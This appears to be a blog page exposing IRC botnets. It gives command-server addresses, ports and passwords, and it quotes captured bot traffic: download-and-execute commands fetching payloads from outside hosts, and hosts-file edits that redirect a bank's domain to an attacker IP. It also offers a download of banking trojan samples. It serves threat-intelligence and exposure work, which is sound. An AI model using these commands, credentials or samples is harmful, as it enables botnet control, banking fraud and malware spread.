93.95.99.87(irc botnet hosted in Russian Federation Moscow Jsc Mediasoft Ekspert)

Remote Host Port Number 93.95.99.87 1866 NICK n[USA|XP|COMPUTERNAME]pxzflri USER hh “” “lol” :hh Now talking in #!h! Modes On: [ #!h! ] [ +smntu ] .load /99/106/112/81/55/59/40/110/116/35/105/120/111/108/117/108/110/38/127/122/100/56/126/9/22/45/45/35/61/47/45/56/47/117/104/83/104/119/126/71/120/46/102/126/105/ hosting infos: http://whois.domaintools.com/93.95.99.87

irc.r00t.me.uk(gBot hosted in Seychelles Ideal Solution Ltd)

Remote Host Port Number irc.r00t.me.uk 7007 PASS gBot NICK n{USA|XP}eqqcbip USER n{USA|XP}eqqcbip 0 0 :n{USA|XP}eqqcbip i dont have the exe to find more infos so try to find chanels your self this botnet is from same guy here:http://www.exposedbotnets.com/2011/06/ircircattinfogbot-variant-hosted-in.html hosting infos: http://whois.domaintools.com/193.107.16.113

60.190.223.42(irc botnet hosted in China Zhejiang Ninbo Lanzhong Network Ltd)

Remote Host Port Number 199.15.234.7 80 70.38.98.236 80 70.38.98.237 80 60.190.223.42 5101 PASS hax0r PRIVMSG #US! :[d=”http://img102.herosh.com/2012/01/14/551459105.gif” s=”65536 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0 PRIVMSG #US! :[d=”http://img103.herosh.com/2012/01/14/594572320.gif” s=”61440 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.tmp” – Download retries: 0 PRIVMSG #US! :[d=”http://img103.herosh.com/2012/01/04/210592960.gif” s=”27648 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data3.tmp”

union-foros.com(irc botnet hosted in Seychelles Ideal Solution Ltd)

Remote Host Port Number 193.107.19.60 1863 NICK {XPUSA919273} JOIN #per PRIVMSG #per : 14,1. 15:: [HOST] adido Host: 3,1 echo 69.64.58.90 www.viabcp.com >> %windir%system32driversetchosts 3,1 echo 69.64.58.90 viabcp.com >> %windir%system32driversetchosts USER COMPUTERNAME * 0 :COMPUTERNAME MODE {XPUSA919273} -ix Now talking in #per Topic On: [ #per ] [ .host.add 69.64.58.90 www.viabcp.com|.host.add 69.64.58.90 viabcp.com ] Topic

d.xludakx.com(ngrBot hosted in Netherlands Amsterdam Leaseweb B.v )

This NgrBotnet conect to 3 domains and is aproximatly 100k: Resolved : [d.xludakx.com] To [95.211.165.62] Resolved : [ab.0n3mmm.com] To [95.211.165.62] Resolved : [ab.0n3mmm.com] To [178.33.143.52] Resolved : [ab.0n3mmm.com] To [109.75.176.231] Resolved : [pusikuracbre.com] To [95.211.165.62] Remote Host Port Number 199.15.234.7 80 95.211.165.62 4949 PASS ngrBot 109.75.176.231 4949 PASS ngrBot 178.33.143.52 4949 PASS ngrBot ab.0n3mmm.com +666

193.107.16.22(irc botnet hosted in Seychelles Ideal Solution Ltd)

Server: 193.107.16.22:8718 nick: pSLXmPY user: wqvryekc chanel: #c Now talking in #c Topic On: [ #c ] [ =dOgdsa09MhlSUc9X89Kr0zVOWZeVEgEv3wA1/TshQtxNUaWqoxiIxkURBNl9r/5JGhteretdAQXvU1kBsZEpDZNZJfkv ] Topic By: [ r ] hosting infos: http://whois.domaintools.com/193.107.16.22

80.79.112.66(ngrBot hosted in Estonia Tallinn Aktsiaselts Wavecom)

Remote Host Port Number 109.68.190.217 80 199.15.234.7 80 80.79.112.66 5749 PASS axplm2 NICK n{US|XPa}psbmdzo USER psbmdzo 0 0 :psbmdzo JOIN #chat Amx4k PRIVMSG win7elite :[d=”http://109.68.190.217/alms22.exe” s=”150528 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataScxaxs.exe” – Download retries: 0 exe file: Download Download hosting infos: http://whois.domaintools.com/80.79.112.66

67Mb Malware Samples

This package have alot of irc bot and banking trojans samples inside have fun exploring samples Download Download

Virus.Win32.Nimnul.a( Malware hosted in United States Network Operations Center Inc)

Hosted in USA also called Ramnit by other antiviruses what this malware does: Capability to send out email message(s) with the built-in SMTP client engine. Produces outbound traffic. Communication with a remote SMTP server and sending out email. Downloads/requests other files from Internet. Compromises SafeBoot registry key(s) in an attempt to disable the Safe Mode.